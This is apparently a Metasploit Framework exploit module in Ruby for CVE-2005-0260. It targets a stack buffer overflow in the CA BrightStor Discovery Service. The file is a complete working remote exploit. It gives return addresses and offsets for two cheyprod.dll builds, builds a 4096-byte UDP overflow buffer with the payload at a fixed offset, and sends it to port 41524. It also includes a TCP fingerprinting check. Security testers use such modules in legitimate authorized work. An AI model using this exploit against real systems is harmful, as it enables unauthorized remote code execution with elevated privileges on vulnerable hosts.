GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/brightstor/discovery_udp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2005-0260, a stack buffer overflow in the
# CA BrightStor Discovery Service triggered by an oversized UDP request to
# port 41524 (see 'Description' below). Two transport mixins are included:
# TCP is used only by #check (service fingerprint on port 41523), UDP only by
# #exploit (the overflow trigger on RPORT).
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Udp

  # Declares module metadata (name, references, payload constraints, targets)
  # and registers the module options. RPORT defaults to 41524, the Discovery
  # Service's UDP port; the TCP port used by #check is hard-coded there and
  # is not affected by RPORT.
  #
  # @param info [Hash] metadata passed in by the framework and merged by
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the CA BrightStor
          Discovery Service. This vulnerability occurs when a large
          request is sent to UDP port 41524, triggering a stack buffer
          overflow.
        },
        'Author' => [ 'hdm', 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0260'],
          [ 'OSVDB', '13613'],
          [ 'BID', '12491'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
        ],
        # The service runs with elevated privileges, so a successful payload
        # does too (hence 'Privileged' => true).
        'Privileged' => true,
        'Payload' => {
          # #exploit copies payload.encoded verbatim into the request buffer
          # at offset 1046 of a 4096-byte buffer; NUL is the only excluded
          # byte.
          'Space' => 2048,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => %w{win},
        # One entry per cheyprod.dll build. 'Offset' is where #exploit writes
        # the return address into the request buffer; 'Ret' is the address
        # it writes there. The payload position (1046) is fixed in #exploit
        # and is not a per-target value.
        'Targets' => [
          [
            'cheyprod.dll 12/12/2003',
            {
              'Platform' => 'win',
              'Ret' => 0x23808eb0, # call to edi reg
              'Offset' => 968,
            },
          ],
          [
            'cheyprod.dll 07/21/2004',
            {
              'Platform' => 'win',
              'Ret' => 0x2380a908, # call edi
              'Offset' => 970,
            },
          ],
        ],
        'DisclosureDate' => '2004-12-20',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(41524)
      ]
    )
  end

  # Fingerprints the Discovery Service over TCP port 41523 with two probes.
  # A bare 'META' request is expected to get no reply, and an 'hMETA' request
  # is expected to be answered with the host name (per the inline comments).
  # Returns Detected only when the second probe is answered and the first is
  # not; otherwise Safe.
  #
  # This is a presence check, not a version check: it never reports
  # Vulnerable, and the cheyprod.dll build dates listed in 'Targets' are not
  # verified here. A service that answers both probes, or neither, is
  # reported Safe even though it may still be the same product.
  #
  # @return [Msf::Exploit::CheckCode] Detected or Safe
  def check
    # The first request should have no reply
    csock = Rex::Socket::Tcp.create(
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => 41523,
      'Context' =>
        {
          'Msf' => framework,
          'MsfExploit' => self,
        }
    )

    csock.put('META')
    # Second argument is presumably a read timeout in seconds — confirm
    # against Rex::Socket::Tcp#get_once. A timeout is expected here and
    # leaves x nil.
    x = csock.get_once(-1, 3)
    # NOTE(review): close is not in an ensure block, so an exception from
    # put/get_once leaves the socket open; same for the second probe below.
    csock.close

    # The second request should be replied with the host name
    csock = Rex::Socket::Tcp.create(
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => 41523,
      'Context' =>
        {
          'Msf' => framework,
          'MsfExploit' => self,
        }
    )

    csock.put('hMETA')
    y = csock.get_once(-1, 3)
    csock.close

    if (y and not x)
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  # Sends the overflow datagram to RPORT over UDP and then runs the payload
  # handler. The 4096-byte buffer is random English filler with the target's
  # return address written at target['Offset'] and the encoded payload
  # written at offset 1046 (tied to the edi register in the target-0 notes
  # below; whether the same position holds for target 1 is not shown here).
  # The single recvfrom after the send is best-effort and its result is
  # ignored.
  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    buf = rand_text_english(4096)

    # Target 0:
    #
    # esp @ 971
    # ret @ 968
    # edi @ 1046
    # end = 4092

    # Little-endian 32-bit return address at the per-target offset.
    buf[target['Offset'], 4] = [ target.ret ].pack('V')
    buf[1046, payload.encoded.length] = payload.encoded

    udp_sock.put(buf)
    udp_sock.recvfrom(8192)

    handler
    disconnect_udp
  end
end